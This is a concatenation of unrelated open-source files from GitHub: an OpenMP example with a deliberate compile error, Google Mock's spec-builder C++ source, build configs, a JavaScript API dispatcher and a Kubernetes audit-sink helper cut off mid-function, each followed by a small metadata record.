"victim_id": "Veterans Health Administration"
}
} | {
"pile_set_name": "Github"
} |
/* { dg-do compile } */
/******************************************************************************
* OpenMP Example - Combined Parallel Loop Work-sharing - C/C++ Version
* FILE: omp_workshare3.c
* DESCRIPTION:
* This example attempts to show use of the parallel for construct. However
* it will generate errors at compile time. Try to determine what is causing
* the error. See omp_workshare4.c for a corrected version.
* SOURCE: Blaise Barney 5/99
* LAST REVISED: 03/03/2002
******************************************************************************/
#include <omp.h>
#include <stdio.h>
#define N 50
#define CHUNKSIZE 5
int
main () {
int i, chunk, tid;
float a[N], b[N], c[N];
/* Some initializations */
for (i=0; i < N; i++)
a[i] = b[i] = i * 1.0;
chunk = CHUNKSIZE;
#pragma omp parallel for \
shared(a,b,c,chunk) \
private(i,tid) \
schedule(static,chunk)
{ /* { dg-error "expected" } */
tid = omp_get_thread_num();
for (i=0; i < N; i++)
{
c[i] = a[i] + b[i];
printf("tid= %d i= %d c[i]= %f\n", tid, i, c[i]);
}
} /* end of parallel for construct */
return 0;
}
| {
"pile_set_name": "Github"
} |
libavcodec/pcm-dvd.o: libavcodec/pcm-dvd.c libavcodec/avcodec.h \
libavutil/samplefmt.h libavutil/avutil.h libavutil/common.h \
libavutil/attributes.h libavutil/macros.h libavutil/version.h \
libavutil/avconfig.h config.h libavutil/intmath.h libavutil/mem.h \
libavutil/error.h libavutil/internal.h libavutil/timer.h libavutil/log.h \
libavutil/cpu.h libavutil/dict.h libavutil/pixfmt.h libavutil/libm.h \
libavutil/intfloat.h libavutil/mathematics.h libavutil/rational.h \
libavutil/attributes.h libavutil/avutil.h libavutil/buffer.h \
libavutil/cpu.h libavutil/channel_layout.h libavutil/dict.h \
libavutil/frame.h libavutil/buffer.h libavutil/samplefmt.h \
libavutil/log.h libavutil/pixfmt.h libavutil/rational.h \
libavcodec/version.h libavutil/version.h libavcodec/bytestream.h \
libavutil/avassert.h libavutil/common.h libavutil/intreadwrite.h \
libavutil/bswap.h libavcodec/internal.h libavutil/mathematics.h
| {
"pile_set_name": "Github"
} |
package nl.joery.demo.animatedbottombar
import android.content.res.Resources
import kotlin.math.roundToInt
internal val Int.dp: Int
get() = (this / Resources.getSystem().displayMetrics.density).roundToInt()
internal val Int.sp: Int
get() = (this / Resources.getSystem().displayMetrics.scaledDensity).roundToInt()
internal val Int.dpPx: Int
get() = (this * Resources.getSystem().displayMetrics.density).roundToInt()
internal val Int.spPx: Int
get() = (this * Resources.getSystem().displayMetrics.scaledDensity).roundToInt() | {
"pile_set_name": "Github"
} |
:pserver:[email protected]:/cvsroot/tclbitprint
| {
"pile_set_name": "Github"
} |
// Copyright 2007, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
// Author: [email protected] (Zhanyong Wan)
// Google Mock - a framework for writing C++ mock classes.
//
// This file implements the spec builder syntax (ON_CALL and
// EXPECT_CALL).
#include "gmock/gmock-spec-builders.h"
#include <stdlib.h>
#include <iostream> // NOLINT
#include <map>
#include <set>
#include <string>
#include "gmock/gmock.h"
#include "gtest/gtest.h"
#if GTEST_OS_CYGWIN || GTEST_OS_LINUX || GTEST_OS_MAC
# include <unistd.h> // NOLINT
#endif
namespace testing {
namespace internal {
// Protects the mock object registry (in class Mock), all function
// mockers, and all expectations.
GTEST_API_ GTEST_DEFINE_STATIC_MUTEX_(g_gmock_mutex);
// Logs a message including file and line number information.
GTEST_API_ void LogWithLocation(testing::internal::LogSeverity severity,
const char* file, int line,
const string& message) {
::std::ostringstream s;
s << file << ":" << line << ": " << message << ::std::endl;
Log(severity, s.str(), 0);
}
// Constructs an ExpectationBase object.
ExpectationBase::ExpectationBase(const char* a_file,
int a_line,
const string& a_source_text)
: file_(a_file),
line_(a_line),
source_text_(a_source_text),
cardinality_specified_(false),
cardinality_(Exactly(1)),
call_count_(0),
retired_(false),
extra_matcher_specified_(false),
repeated_action_specified_(false),
retires_on_saturation_(false),
last_clause_(kNone),
action_count_checked_(false) {}
// Destructs an ExpectationBase object.
ExpectationBase::~ExpectationBase() {}
// Explicitly specifies the cardinality of this expectation. Used by
// the subclasses to implement the .Times() clause.
void ExpectationBase::SpecifyCardinality(const Cardinality& a_cardinality) {
cardinality_specified_ = true;
cardinality_ = a_cardinality;
}
// Retires all pre-requisites of this expectation.
void ExpectationBase::RetireAllPreRequisites()
GTEST_EXCLUSIVE_LOCK_REQUIRED_(g_gmock_mutex) {
if (is_retired()) {
// We can take this short-cut as we never retire an expectation
// until we have retired all its pre-requisites.
return;
}
for (ExpectationSet::const_iterator it = immediate_prerequisites_.begin();
it != immediate_prerequisites_.end(); ++it) {
ExpectationBase* const prerequisite = it->expectation_base().get();
if (!prerequisite->is_retired()) {
prerequisite->RetireAllPreRequisites();
prerequisite->Retire();
}
}
}
// Returns true iff all pre-requisites of this expectation have been
// satisfied.
bool ExpectationBase::AllPrerequisitesAreSatisfied() const
GTEST_EXCLUSIVE_LOCK_REQUIRED_(g_gmock_mutex) {
g_gmock_mutex.AssertHeld();
for (ExpectationSet::const_iterator it = immediate_prerequisites_.begin();
it != immediate_prerequisites_.end(); ++it) {
if (!(it->expectation_base()->IsSatisfied()) ||
!(it->expectation_base()->AllPrerequisitesAreSatisfied()))
return false;
}
return true;
}
// Adds unsatisfied pre-requisites of this expectation to 'result'.
void ExpectationBase::FindUnsatisfiedPrerequisites(ExpectationSet* result) const
GTEST_EXCLUSIVE_LOCK_REQUIRED_(g_gmock_mutex) {
g_gmock_mutex.AssertHeld();
for (ExpectationSet::const_iterator it = immediate_prerequisites_.begin();
it != immediate_prerequisites_.end(); ++it) {
if (it->expectation_base()->IsSatisfied()) {
// If *it is satisfied and has a call count of 0, some of its
// pre-requisites may not be satisfied yet.
if (it->expectation_base()->call_count_ == 0) {
it->expectation_base()->FindUnsatisfiedPrerequisites(result);
}
} else {
// Now that we know *it is unsatisfied, we are not so interested
// in whether its pre-requisites are satisfied. Therefore we
// don't recursively call FindUnsatisfiedPrerequisites() here.
*result += *it;
}
}
}
// Describes how many times a function call matching this
// expectation has occurred.
void ExpectationBase::DescribeCallCountTo(::std::ostream* os) const
GTEST_EXCLUSIVE_LOCK_REQUIRED_(g_gmock_mutex) {
g_gmock_mutex.AssertHeld();
// Describes how many times the function is expected to be called.
*os << " Expected: to be ";
cardinality().DescribeTo(os);
*os << "\n Actual: ";
Cardinality::DescribeActualCallCountTo(call_count(), os);
// Describes the state of the expectation (e.g. is it satisfied?
// is it active?).
*os << " - " << (IsOverSaturated() ? "over-saturated" :
IsSaturated() ? "saturated" :
IsSatisfied() ? "satisfied" : "unsatisfied")
<< " and "
<< (is_retired() ? "retired" : "active");
}
// Checks the action count (i.e. the number of WillOnce() and
// WillRepeatedly() clauses) against the cardinality if this hasn't
// been done before. Prints a warning if there are too many or too
// few actions.
void ExpectationBase::CheckActionCountIfNotDone() const
GTEST_LOCK_EXCLUDED_(mutex_) {
bool should_check = false;
{
MutexLock l(&mutex_);
if (!action_count_checked_) {
action_count_checked_ = true;
should_check = true;
}
}
if (should_check) {
if (!cardinality_specified_) {
// The cardinality was inferred - no need to check the action
// count against it.
return;
}
// The cardinality was explicitly specified.
const int action_count = static_cast<int>(untyped_actions_.size());
const int upper_bound = cardinality().ConservativeUpperBound();
const int lower_bound = cardinality().ConservativeLowerBound();
bool too_many; // True if there are too many actions, or false
// if there are too few.
if (action_count > upper_bound ||
(action_count == upper_bound && repeated_action_specified_)) {
too_many = true;
} else if (0 < action_count && action_count < lower_bound &&
!repeated_action_specified_) {
too_many = false;
} else {
return;
}
::std::stringstream ss;
DescribeLocationTo(&ss);
ss << "Too " << (too_many ? "many" : "few")
<< " actions specified in " << source_text() << "...\n"
<< "Expected to be ";
cardinality().DescribeTo(&ss);
ss << ", but has " << (too_many ? "" : "only ")
<< action_count << " WillOnce()"
<< (action_count == 1 ? "" : "s");
if (repeated_action_specified_) {
ss << " and a WillRepeatedly()";
}
ss << ".";
Log(kWarning, ss.str(), -1); // -1 means "don't print stack trace".
}
}
// Implements the .Times() clause.
void ExpectationBase::UntypedTimes(const Cardinality& a_cardinality) {
if (last_clause_ == kTimes) {
ExpectSpecProperty(false,
".Times() cannot appear "
"more than once in an EXPECT_CALL().");
} else {
ExpectSpecProperty(last_clause_ < kTimes,
".Times() cannot appear after "
".InSequence(), .WillOnce(), .WillRepeatedly(), "
"or .RetiresOnSaturation().");
}
last_clause_ = kTimes;
SpecifyCardinality(a_cardinality);
}
// Points to the implicit sequence introduced by a living InSequence
// object (if any) in the current thread or NULL.
GTEST_API_ ThreadLocal<Sequence*> g_gmock_implicit_sequence;
// Reports an uninteresting call (whose description is in msg) in the
// manner specified by 'reaction'.
void ReportUninterestingCall(CallReaction reaction, const string& msg) {
// Include a stack trace only if --gmock_verbose=info is specified.
const int stack_frames_to_skip =
GMOCK_FLAG(verbose) == kInfoVerbosity ? 3 : -1;
switch (reaction) {
case kAllow:
Log(kInfo, msg, stack_frames_to_skip);
break;
case kWarn:
Log(kWarning,
msg +
"\nNOTE: You can safely ignore the above warning unless this "
"call should not happen. Do not suppress it by blindly adding "
"an EXPECT_CALL() if you don't mean to enforce the call. "
"See https://github.com/google/googletest/blob/master/googlemock/docs/CookBook.md#"
"knowing-when-to-expect for details.\n",
stack_frames_to_skip);
break;
default: // FAIL
Expect(false, NULL, -1, msg);
}
}
UntypedFunctionMockerBase::UntypedFunctionMockerBase()
: mock_obj_(NULL), name_("") {}
UntypedFunctionMockerBase::~UntypedFunctionMockerBase() {}
// Sets the mock object this mock method belongs to, and registers
// this information in the global mock registry. Will be called
// whenever an EXPECT_CALL() or ON_CALL() is executed on this mock
// method.
void UntypedFunctionMockerBase::RegisterOwner(const void* mock_obj)
GTEST_LOCK_EXCLUDED_(g_gmock_mutex) {
{
MutexLock l(&g_gmock_mutex);
mock_obj_ = mock_obj;
}
Mock::Register(mock_obj, this);
}
// Sets the mock object this mock method belongs to, and sets the name
// of the mock function. Will be called upon each invocation of this
// mock function.
void UntypedFunctionMockerBase::SetOwnerAndName(const void* mock_obj,
const char* name)
GTEST_LOCK_EXCLUDED_(g_gmock_mutex) {
// We protect name_ under g_gmock_mutex in case this mock function
// is called from two threads concurrently.
MutexLock l(&g_gmock_mutex);
mock_obj_ = mock_obj;
name_ = name;
}
// Returns the name of the function being mocked. Must be called
// after RegisterOwner() or SetOwnerAndName() has been called.
const void* UntypedFunctionMockerBase::MockObject() const
GTEST_LOCK_EXCLUDED_(g_gmock_mutex) {
const void* mock_obj;
{
// We protect mock_obj_ under g_gmock_mutex in case this mock
// function is called from two threads concurrently.
MutexLock l(&g_gmock_mutex);
Assert(mock_obj_ != NULL, __FILE__, __LINE__,
"MockObject() must not be called before RegisterOwner() or "
"SetOwnerAndName() has been called.");
mock_obj = mock_obj_;
}
return mock_obj;
}
// Returns the name of this mock method. Must be called after
// SetOwnerAndName() has been called.
const char* UntypedFunctionMockerBase::Name() const
GTEST_LOCK_EXCLUDED_(g_gmock_mutex) {
const char* name;
{
// We protect name_ under g_gmock_mutex in case this mock
// function is called from two threads concurrently.
MutexLock l(&g_gmock_mutex);
Assert(name_ != NULL, __FILE__, __LINE__,
"Name() must not be called before SetOwnerAndName() has "
"been called.");
name = name_;
}
return name;
}
// Calculates the result of invoking this mock function with the given
// arguments, prints it, and returns it. The caller is responsible
// for deleting the result.
UntypedActionResultHolderBase*
UntypedFunctionMockerBase::UntypedInvokeWith(const void* const untyped_args)
GTEST_LOCK_EXCLUDED_(g_gmock_mutex) {
if (untyped_expectations_.size() == 0) {
// No expectation is set on this mock method - we have an
// uninteresting call.
// We must get Google Mock's reaction on uninteresting calls
// made on this mock object BEFORE performing the action,
// because the action may DELETE the mock object and make the
// following expression meaningless.
const CallReaction reaction =
Mock::GetReactionOnUninterestingCalls(MockObject());
// True iff we need to print this call's arguments and return
// value. This definition must be kept in sync with
// the behavior of ReportUninterestingCall().
const bool need_to_report_uninteresting_call =
// If the user allows this uninteresting call, we print it
// only when he wants informational messages.
reaction == kAllow ? LogIsVisible(kInfo) :
// If the user wants this to be a warning, we print it only
// when he wants to see warnings.
reaction == kWarn ? LogIsVisible(kWarning) :
// Otherwise, the user wants this to be an error, and we
// should always print detailed information in the error.
true;
if (!need_to_report_uninteresting_call) {
// Perform the action without printing the call information.
return this->UntypedPerformDefaultAction(untyped_args, "");
}
// Warns about the uninteresting call.
::std::stringstream ss;
this->UntypedDescribeUninterestingCall(untyped_args, &ss);
// Calculates the function result.
UntypedActionResultHolderBase* const result =
this->UntypedPerformDefaultAction(untyped_args, ss.str());
// Prints the function result.
if (result != NULL)
result->PrintAsActionResult(&ss);
ReportUninterestingCall(reaction, ss.str());
return result;
}
bool is_excessive = false;
::std::stringstream ss;
::std::stringstream why;
::std::stringstream loc;
const void* untyped_action = NULL;
// The UntypedFindMatchingExpectation() function acquires and
// releases g_gmock_mutex.
const ExpectationBase* const untyped_expectation =
this->UntypedFindMatchingExpectation(
untyped_args, &untyped_action, &is_excessive,
&ss, &why);
const bool found = untyped_expectation != NULL;
// True iff we need to print the call's arguments and return value.
// This definition must be kept in sync with the uses of Expect()
// and Log() in this function.
const bool need_to_report_call =
!found || is_excessive || LogIsVisible(kInfo);
if (!need_to_report_call) {
// Perform the action without printing the call information.
return
untyped_action == NULL ?
this->UntypedPerformDefaultAction(untyped_args, "") :
this->UntypedPerformAction(untyped_action, untyped_args);
}
ss << " Function call: " << Name();
this->UntypedPrintArgs(untyped_args, &ss);
// In case the action deletes a piece of the expectation, we
// generate the message beforehand.
if (found && !is_excessive) {
untyped_expectation->DescribeLocationTo(&loc);
}
UntypedActionResultHolderBase* const result =
untyped_action == NULL ?
this->UntypedPerformDefaultAction(untyped_args, ss.str()) :
this->UntypedPerformAction(untyped_action, untyped_args);
if (result != NULL)
result->PrintAsActionResult(&ss);
ss << "\n" << why.str();
if (!found) {
// No expectation matches this call - reports a failure.
Expect(false, NULL, -1, ss.str());
} else if (is_excessive) {
// We had an upper-bound violation and the failure message is in ss.
Expect(false, untyped_expectation->file(),
untyped_expectation->line(), ss.str());
} else {
// We had an expected call and the matching expectation is
// described in ss.
Log(kInfo, loc.str() + ss.str(), 2);
}
return result;
}
// Returns an Expectation object that references and co-owns exp,
// which must be an expectation on this mock function.
Expectation UntypedFunctionMockerBase::GetHandleOf(ExpectationBase* exp) {
for (UntypedExpectations::const_iterator it =
untyped_expectations_.begin();
it != untyped_expectations_.end(); ++it) {
if (it->get() == exp) {
return Expectation(*it);
}
}
Assert(false, __FILE__, __LINE__, "Cannot find expectation.");
return Expectation();
// The above statement is just to make the code compile, and will
// never be executed.
}
// Verifies that all expectations on this mock function have been
// satisfied. Reports one or more Google Test non-fatal failures
// and returns false if not.
bool UntypedFunctionMockerBase::VerifyAndClearExpectationsLocked()
GTEST_EXCLUSIVE_LOCK_REQUIRED_(g_gmock_mutex) {
g_gmock_mutex.AssertHeld();
bool expectations_met = true;
for (UntypedExpectations::const_iterator it =
untyped_expectations_.begin();
it != untyped_expectations_.end(); ++it) {
ExpectationBase* const untyped_expectation = it->get();
if (untyped_expectation->IsOverSaturated()) {
// There was an upper-bound violation. Since the error was
// already reported when it occurred, there is no need to do
// anything here.
expectations_met = false;
} else if (!untyped_expectation->IsSatisfied()) {
expectations_met = false;
::std::stringstream ss;
ss << "Actual function call count doesn't match "
<< untyped_expectation->source_text() << "...\n";
// No need to show the source file location of the expectation
// in the description, as the Expect() call that follows already
// takes care of it.
untyped_expectation->MaybeDescribeExtraMatcherTo(&ss);
untyped_expectation->DescribeCallCountTo(&ss);
Expect(false, untyped_expectation->file(),
untyped_expectation->line(), ss.str());
}
}
// Deleting our expectations may trigger other mock objects to be deleted, for
// example if an action contains a reference counted smart pointer to that
// mock object, and that is the last reference. So if we delete our
// expectations within the context of the global mutex we may deadlock when
// this method is called again. Instead, make a copy of the set of
// expectations to delete, clear our set within the mutex, and then clear the
// copied set outside of it.
UntypedExpectations expectations_to_delete;
untyped_expectations_.swap(expectations_to_delete);
g_gmock_mutex.Unlock();
expectations_to_delete.clear();
g_gmock_mutex.Lock();
return expectations_met;
}
} // namespace internal
// Class Mock.
namespace {
typedef std::set<internal::UntypedFunctionMockerBase*> FunctionMockers;
// The current state of a mock object. Such information is needed for
// detecting leaked mock objects and explicitly verifying a mock's
// expectations.
struct MockObjectState {
MockObjectState()
: first_used_file(NULL), first_used_line(-1), leakable(false) {}
// Where in the source file an ON_CALL or EXPECT_CALL is first
// invoked on this mock object.
const char* first_used_file;
int first_used_line;
::std::string first_used_test_case;
::std::string first_used_test;
bool leakable; // true iff it's OK to leak the object.
FunctionMockers function_mockers; // All registered methods of the object.
};
// A global registry holding the state of all mock objects that are
// alive. A mock object is added to this registry the first time
// Mock::AllowLeak(), ON_CALL(), or EXPECT_CALL() is called on it. It
// is removed from the registry in the mock object's destructor.
class MockObjectRegistry {
public:
// Maps a mock object (identified by its address) to its state.
typedef std::map<const void*, MockObjectState> StateMap;
// This destructor will be called when a program exits, after all
// tests in it have been run. By then, there should be no mock
// object alive. Therefore we report any living object as test
// failure, unless the user explicitly asked us to ignore it.
~MockObjectRegistry() {
// "using ::std::cout;" doesn't work with Symbian's STLport, where cout is
// a macro.
if (!GMOCK_FLAG(catch_leaked_mocks))
return;
int leaked_count = 0;
for (StateMap::const_iterator it = states_.begin(); it != states_.end();
++it) {
if (it->second.leakable) // The user said it's fine to leak this object.
continue;
// TODO([email protected]): Print the type of the leaked object.
// This can help the user identify the leaked object.
std::cout << "\n";
const MockObjectState& state = it->second;
std::cout << internal::FormatFileLocation(state.first_used_file,
state.first_used_line);
std::cout << " ERROR: this mock object";
if (state.first_used_test != "") {
std::cout << " (used in test " << state.first_used_test_case << "."
<< state.first_used_test << ")";
}
std::cout << " should be deleted but never is. Its address is @"
<< it->first << ".";
leaked_count++;
}
if (leaked_count > 0) {
std::cout << "\nERROR: " << leaked_count
<< " leaked mock " << (leaked_count == 1 ? "object" : "objects")
<< " found at program exit.\n";
std::cout.flush();
::std::cerr.flush();
// RUN_ALL_TESTS() has already returned when this destructor is
// called. Therefore we cannot use the normal Google Test
// failure reporting mechanism.
_exit(1); // We cannot call exit() as it is not reentrant and
// may already have been called.
}
}
StateMap& states() { return states_; }
private:
StateMap states_;
};
// Protected by g_gmock_mutex.
MockObjectRegistry g_mock_object_registry;
// Maps a mock object to the reaction Google Mock should have when an
// uninteresting method is called. Protected by g_gmock_mutex.
std::map<const void*, internal::CallReaction> g_uninteresting_call_reaction;
// Sets the reaction Google Mock should have when an uninteresting
// method of the given mock object is called.
void SetReactionOnUninterestingCalls(const void* mock_obj,
internal::CallReaction reaction)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
g_uninteresting_call_reaction[mock_obj] = reaction;
}
} // namespace
// Tells Google Mock to allow uninteresting calls on the given mock
// object.
void Mock::AllowUninterestingCalls(const void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
SetReactionOnUninterestingCalls(mock_obj, internal::kAllow);
}
// Tells Google Mock to warn the user about uninteresting calls on the
// given mock object.
void Mock::WarnUninterestingCalls(const void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
SetReactionOnUninterestingCalls(mock_obj, internal::kWarn);
}
// Tells Google Mock to fail uninteresting calls on the given mock
// object.
void Mock::FailUninterestingCalls(const void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
SetReactionOnUninterestingCalls(mock_obj, internal::kFail);
}
// Tells Google Mock the given mock object is being destroyed and its
// entry in the call-reaction table should be removed.
void Mock::UnregisterCallReaction(const void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
g_uninteresting_call_reaction.erase(mock_obj);
}
// Returns the reaction Google Mock will have on uninteresting calls
// made on the given mock object.
internal::CallReaction Mock::GetReactionOnUninterestingCalls(
const void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
return (g_uninteresting_call_reaction.count(mock_obj) == 0) ?
internal::kDefault : g_uninteresting_call_reaction[mock_obj];
}
// Tells Google Mock to ignore mock_obj when checking for leaked mock
// objects.
void Mock::AllowLeak(const void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
g_mock_object_registry.states()[mock_obj].leakable = true;
}
// Verifies and clears all expectations on the given mock object. If
// the expectations aren't satisfied, generates one or more Google
// Test non-fatal failures and returns false.
bool Mock::VerifyAndClearExpectations(void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
return VerifyAndClearExpectationsLocked(mock_obj);
}
// Verifies all expectations on the given mock object and clears its
// default actions and expectations. Returns true iff the
// verification was successful.
bool Mock::VerifyAndClear(void* mock_obj)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
ClearDefaultActionsLocked(mock_obj);
return VerifyAndClearExpectationsLocked(mock_obj);
}
// Verifies and clears all expectations on the given mock object. If
// the expectations aren't satisfied, generates one or more Google
// Test non-fatal failures and returns false.
bool Mock::VerifyAndClearExpectationsLocked(void* mock_obj)
GTEST_EXCLUSIVE_LOCK_REQUIRED_(internal::g_gmock_mutex) {
internal::g_gmock_mutex.AssertHeld();
if (g_mock_object_registry.states().count(mock_obj) == 0) {
// No EXPECT_CALL() was set on the given mock object.
return true;
}
// Verifies and clears the expectations on each mock method in the
// given mock object.
bool expectations_met = true;
FunctionMockers& mockers =
g_mock_object_registry.states()[mock_obj].function_mockers;
for (FunctionMockers::const_iterator it = mockers.begin();
it != mockers.end(); ++it) {
if (!(*it)->VerifyAndClearExpectationsLocked()) {
expectations_met = false;
}
}
// We don't clear the content of mockers, as they may still be
// needed by ClearDefaultActionsLocked().
return expectations_met;
}
// Registers a mock object and a mock method it owns.
void Mock::Register(const void* mock_obj,
internal::UntypedFunctionMockerBase* mocker)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
g_mock_object_registry.states()[mock_obj].function_mockers.insert(mocker);
}
// Tells Google Mock where in the source code mock_obj is used in an
// ON_CALL or EXPECT_CALL. In case mock_obj is leaked, this
// information helps the user identify which object it is.
void Mock::RegisterUseByOnCallOrExpectCall(const void* mock_obj,
const char* file, int line)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
MockObjectState& state = g_mock_object_registry.states()[mock_obj];
if (state.first_used_file == NULL) {
state.first_used_file = file;
state.first_used_line = line;
const TestInfo* const test_info =
UnitTest::GetInstance()->current_test_info();
if (test_info != NULL) {
// TODO([email protected]): record the test case name when the
// ON_CALL or EXPECT_CALL is invoked from SetUpTestCase() or
// TearDownTestCase().
state.first_used_test_case = test_info->test_case_name();
state.first_used_test = test_info->name();
}
}
}
// Unregisters a mock method; removes the owning mock object from the
// registry when the last mock method associated with it has been
// unregistered. This is called only in the destructor of
// FunctionMockerBase.
void Mock::UnregisterLocked(internal::UntypedFunctionMockerBase* mocker)
GTEST_EXCLUSIVE_LOCK_REQUIRED_(internal::g_gmock_mutex) {
internal::g_gmock_mutex.AssertHeld();
for (MockObjectRegistry::StateMap::iterator it =
g_mock_object_registry.states().begin();
it != g_mock_object_registry.states().end(); ++it) {
FunctionMockers& mockers = it->second.function_mockers;
if (mockers.erase(mocker) > 0) {
// mocker was in mockers and has been just removed.
if (mockers.empty()) {
g_mock_object_registry.states().erase(it);
}
return;
}
}
}
// Clears all ON_CALL()s set on the given mock object.
void Mock::ClearDefaultActionsLocked(void* mock_obj)
GTEST_EXCLUSIVE_LOCK_REQUIRED_(internal::g_gmock_mutex) {
internal::g_gmock_mutex.AssertHeld();
if (g_mock_object_registry.states().count(mock_obj) == 0) {
// No ON_CALL() was set on the given mock object.
return;
}
// Clears the default actions for each mock method in the given mock
// object.
FunctionMockers& mockers =
g_mock_object_registry.states()[mock_obj].function_mockers;
for (FunctionMockers::const_iterator it = mockers.begin();
it != mockers.end(); ++it) {
(*it)->ClearDefaultActionsLocked();
}
// We don't clear the content of mockers, as they may still be
// needed by VerifyAndClearExpectationsLocked().
}
Expectation::Expectation() {}
Expectation::Expectation(
const internal::linked_ptr<internal::ExpectationBase>& an_expectation_base)
: expectation_base_(an_expectation_base) {}
Expectation::~Expectation() {}
// Adds an expectation to a sequence.
void Sequence::AddExpectation(const Expectation& expectation) const {
if (*last_expectation_ != expectation) {
if (last_expectation_->expectation_base() != NULL) {
expectation.expectation_base()->immediate_prerequisites_
+= *last_expectation_;
}
*last_expectation_ = expectation;
}
}
// Creates the implicit sequence if there isn't one.
InSequence::InSequence() {
if (internal::g_gmock_implicit_sequence.get() == NULL) {
internal::g_gmock_implicit_sequence.set(new Sequence);
sequence_created_ = true;
} else {
sequence_created_ = false;
}
}
// Deletes the implicit sequence if it was created by the constructor
// of this object.
InSequence::~InSequence() {
if (sequence_created_) {
delete internal::g_gmock_implicit_sequence.get();
internal::g_gmock_implicit_sequence.set(NULL);
}
}
} // namespace testing
| {
"pile_set_name": "Github"
} |
import registerExtension from './RegisterExtension';
import registerDomain from './RegisterDomain';
import account from './Account';
import user from './Account/user';
import users from './Account/users';
import encryptMessage from './Account/encrypt';
import decryptMessage from './Account/decrypt';
import prove from './Prove';
import asset from './Asset';
import assetBalance from './Asset/getBalance';
import fetchNotesFromBalance from './Asset/fetchNotesFromBalance';
import fetchTransactions from './Asset/fetchTransactions';
import note from './Note';
import noteWithViewingKey from './Note/exportViewingKey';
import grantNoteAccess from './Note/grantNoteAccess';
import validateParameters from './middlewares/validateParameters';
import validateRequest from './middlewares/validateRequest';
const apis = {
registerExtension,
registerDomain,
account,
user,
users,
encryptMessage,
decryptMessage,
asset,
assetBalance,
fetchNotesFromBalance,
fetchTransactions,
note,
noteWithViewingKey,
grantNoteAccess,
constructProof: prove,
};
const clientApi = async (request, connection) => {
// TODO move all auth here
const {
data: {
query,
args,
},
} = request;
const invalidParamsResp = validateParameters(query, args);
if (invalidParamsResp) {
return {
...request,
data: invalidParamsResp,
};
}
const invalidRequestResp = await validateRequest(query, args);
if (invalidRequestResp) {
return {
...request,
data: invalidRequestResp,
};
}
const data = await apis[query](request, connection);
return {
...request,
data: query === 'constructProof'
? { data }
: data,
};
};
const uiApi = async (request) => {
const {
data: {
query,
},
} = request;
const data = await apis[query](request);
return {
...request,
response: data,
};
};
const apiExists = query => !!apis[query];
export default {
clientApi,
uiApi,
apiExists,
};
| {
"pile_set_name": "Github"
} |
# We have a conf and classes directory, add to BBPATH
BBPATH .= ":${LAYERDIR}"
# We have recipes-* directories, add to BBFILES
BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
${LAYERDIR}/recipes-*/*/*.bbappend"
BBFILE_COLLECTIONS += "olympus-layer"
BBFILE_PATTERN_olympus-layer = "^${LAYERDIR}/"
BBFILE_PRIORITY_olympus-layer = "6"
LAYERSERIES_COMPAT_olympus-layer = "warrior"
| {
"pile_set_name": "Github"
} |
---
title: "purevpn"
layout: cask
---
{{ content }}
| {
"pile_set_name": "Github"
} |
/*
Copyright 2018 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package util
import (
"k8s.io/api/auditregistration/v1alpha1"
"k8s.io/apiserver/pkg/util/webhook"
)
// HookClientConfigForSink constructs a webhook.ClientConfig using a v1alpha1.AuditSink API object.
// webhook.ClientConfig is used to create a HookClient and the purpose of the config struct is to
// share that with other packages that need to create a HookClient.
func HookClientConfigForSink(a *v1alpha1.AuditSink) webhook.ClientConfig {
c := a.Spec.Webhook.ClientConfig
ret := webhook.ClientConfig{Name: a.Name, CABundle: c.CABundle}
if c.URL != nil {
ret.URL = *c.URL
}
if c.Service != nil {
